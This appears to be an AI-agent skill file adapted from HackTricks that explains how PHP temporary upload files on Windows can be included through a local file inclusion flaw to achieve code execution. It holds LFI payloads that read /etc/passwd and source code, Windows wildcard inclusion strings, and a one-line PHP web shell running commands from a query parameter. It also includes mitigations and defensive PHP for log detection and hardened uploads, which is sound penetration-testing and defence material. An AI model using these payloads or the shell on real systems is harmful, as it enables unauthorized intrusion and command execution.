Hacktricks-skills lfi-temp-file-exploitation

How to test for and exploit Local File Inclusion (LFI) vulnerabilities that can lead to Remote Code Execution (RCE) through temporary file uploads. Use this skill whenever you're testing web applications for file inclusion vulnerabilities, analyzing PHP file upload handlers, investigating potential LFI-to-RCE attack vectors, or when a user mentions LFI, file uploads, temporary files, or PHP file handling in a security testing context.

Install: clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads/SKILL.MD

Source content

LFI to RCE via Temporary File Uploads

This skill helps you test for and understand Local File Inclusion (LFI) vulnerabilities that can be exploited through PHP's temporary file upload mechanism to achieve Remote Code Execution (RCE).

Understanding the Vulnerability

How PHP File Uploads Work

When PHP receives a POST request with files formatted according to RFC 1867, it:

  1. Creates temporary files to store the uploaded data
  2. Stores these files in a system-specific temporary directory
  3. Automatically deletes any remaining temporary files after script execution
  4. Requires move_uploaded_file() to relocate files for persistent storage

The Attack Vector: If an application has an LFI vulnerability, attackers can include these temporary files during the upload window before PHP deletes them, potentially executing malicious code.

The Challenge

The main obstacle is predicting the temporary file's name, which is intentionally randomized. However, the randomization strength varies significantly between operating systems.

Windows Exploitation

Windows systems have weaker randomization, making exploitation more feasible.

Temporary File Naming Pattern

On Windows, PHP uses GetTempFileName, which creates files with this pattern:

<path>\<pre><uuuu>.TMP

Where:

  • Path: typically C:\Windows\Temp
  • Prefix: usually php
  • <uuuu>: unique hexadecimal value (only the lower 16 bits are used)

Key Insight: with a constant path and prefix, only 65,535 unique names are possible, which makes brute force feasible.

Wildcard Exploitation

The Windows FindFirstFile function allows wildcards in LFI paths. Use this to locate temporary files:

http://site/vuln.php?inc=c:\windows\temp\php<<

Testing Strategy:

  1. Start with the basic wildcard pattern: php<<
  2. If needed, try more specific masks: php1<<, phpA<<, php0<<
  3. Systematically iterate through different prefix variations

Common Windows Temp Paths to Test

C:\Windows\Temp\php<<
C:\Temp\php<<
C:\Windows\TEMP\php<<
%TEMP%\php<<

Linux Exploitation

Linux systems use robust randomization for temporary file names, making them:

  • Not predictable
  • Not susceptible to brute force attacks
  • Generally not exploitable via this technique

Note: Focus your testing efforts on Windows systems when using this technique.

Testing Methodology

Step 1: Identify File Upload Functionality

Look for:

  • File input fields (<input type="file">)
  • PHP scripts handling file uploads
  • POST requests with multipart/form-data

Step 2: Confirm LFI Vulnerability

Test for LFI with standard payloads:

?include=../../etc/passwd
?file=....//....//....//etc/passwd
?inc=php://filter/convert.base64-encode/resource=index.php

Step 3: Test Temporary File Inclusion

  1. Prepare a malicious payload (e.g., PHP shell)
  2. Upload the file while simultaneously attempting LFI
  3. Use wildcard patterns on Windows to locate the temp file
  4. Verify code execution through the included file

Step 4: Timing Considerations

The attack window is narrow:

  • Upload must complete
  • LFI must occur before script execution ends
  • PHP must not have deleted the temp file yet

Consider using:

  • Concurrent requests
  • Slowloris-style delays
  • Race condition techniques

Example Payloads

Basic PHP Shell

<?php echo "LFI to RCE successful!"; system($_GET['cmd']); ?>

Windows Wildcard LFI Payloads

?inc=c:\windows\temp\php<<
?inc=c:\windows\temp\php1<<
?inc=c:\windows\temp\phpA<<
?inc=c:\windows\temp\php0<<
?inc=c:\windows\temp\php*<<

Detection and Prevention

For Security Testers

Signs of vulnerability:

  • PHP file upload functionality present
  • LFI vulnerability confirmed
  • Windows server environment
  • Temporary files accessible via include paths
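As an added defender-side check (not part of the skill), the following PHP script scans common/combined-format access-log lines for query parameters carrying the Windows wildcard form php<<, phpA<<, php*<< described above. The log lines are constructed for this example.

```php
<?php
// Added defender-side check (not part of the skill): scan access-log lines for query
// parameters carrying the Windows wildcard form php<<, phpA<<, php*<< described above.
// The log lines below are constructed for this example.
declare(strict_types=1);

const SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /upload.php HTTP/1.1" 200 14',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /vuln.php?inc=c:%5Cwindows%5Ctemp%5Cphp%3C%3C HTTP/1.1" 200 87',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /vuln.php?inc=c:%5Cwindows%5Ctemp%5CphpA%3C%3C HTTP/1.1" 500 0',
];

/** Return one record per parameter value that matches the wildcard pattern. */
function findWildcardIncludes(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Pull the client IP and request target out of a common/combined log format line.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        [$ip, $target] = [$m[1], $m[2]];
        $pos = strpos($target, '?');
        if ($pos === false) {
            continue;                          // no query string, nothing to inspect
        }
        parse_str(substr($target, $pos + 1), $params);   // also percent-decodes %5C and %3C
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;
            }
            // "<<" after a php prefix is the FindFirstFile wildcard; the optional
            // character class covers the more specific masks (php1<<, phpA<<, php*<<).
            if (preg_match('/php[0-9a-z*]?<</i', $value)) {
                $hits[] = ['ip' => $ip, 'param' => (string) $name, 'value' => $value];
            }
        }
    }
    return $hits;
}

foreach (findWildcardIncludes(SAMPLE_LOG) as $h) {
    printf("ALERT %s param=%s value=%s\n", $h['ip'], $h['param'], $h['value']);
}
```

Run against the constructed log it reports the two vuln.php requests from 10.0.0.9 and ignores the benign page=home request; a POST to an upload endpoint from the same client in the same second is the upload half of the chain described under Step 3.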

For Defenders

Mitigation strategies:

  1. Disable file uploads if not needed
  2. Use move_uploaded_file() immediately after upload
  3. Store uploads outside the web root
  4. Disable allow_url_include in php.ini
  5. Implement strict file validation
  6. Use prepared statements for file paths
  7. Apply the principle of least privilege
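The following PHP is an added defender-side example, not code from the skill: an upload handler that applies mitigations 2, 3 and 5 from the list above, plus an allowlisted include that removes the LFI at the root of the chain. It assumes a form field named "document", an UPLOAD_DIR outside the web root, and pages/home.php and pages/about.php; adjust these for your application.

```php
<?php
// Added defender-side example (not from the HackTricks skill): hardened upload handling
// plus an allowlisted include. Assumed: field "document", UPLOAD_DIR outside the web root,
// and the pages/ directory below; adjust for your application.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';  // assumed path, not under DocumentRoot
const MAX_BYTES  = 2 * 1024 * 1024;     // 2 MiB cap chosen for the example
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'application/pdf' => 'pdf'];

function storeUpload(string $field): string
{
    if (!isset($_FILES[$field]) || $_FILES[$field]['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('no valid upload in field ' . $field);
    }
    $tmp = $_FILES[$field]['tmp_name'];
    // Only accept PHP's own temp file for this request, never a caller-supplied path.
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('tmp_name is not an uploaded file');
    }
    if (filesize($tmp) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the real content type; $_FILES[...]['type'] is client-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('disallowed content type: ' . $mime);
    }
    // Server-generated name and extension; the client filename never reaches the filesystem.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    // Relocate at once so the php<uuuu>.TMP file is gone from the temp directory
    // for the rest of the request, closing the inclusion window the skill describes.
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('move_uploaded_file failed');
    }
    chmod($dest, 0640);
    return $dest;
}

// The LFI side of the chain: map a fixed key to a fixed path instead of including user input.
function renderPage(string $key): void
{
    $pages = ['home' => __DIR__ . '/pages/home.php', 'about' => __DIR__ . '/pages/about.php'];
    if (!array_key_exists($key, $pages)) {
        http_response_code(404);
        return;
    }
    require $pages[$key];
}
```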

Tools and Scripts

Use the bundled scripts in scripts/ to:

  • Generate wildcard test payloads for Windows
  • Enumerate common temp file paths
  • Create test payloads for upload testing

Safety and Ethics

Important: Only test systems you have explicit authorization to assess. Unauthorized exploitation of LFI vulnerabilities is illegal and unethical.

When to Use This Skill

Use this skill when:

  • Testing web applications for LFI vulnerabilities
  • Analyzing PHP file upload handlers
  • Investigating potential RCE attack vectors
  • Security assessments involving file inclusion
  • A user mentions LFI, file uploads, temporary files, or PHP file handling in a security context
  • Preparing for penetration testing engagements
  • Understanding the LFI-to-RCE attack chain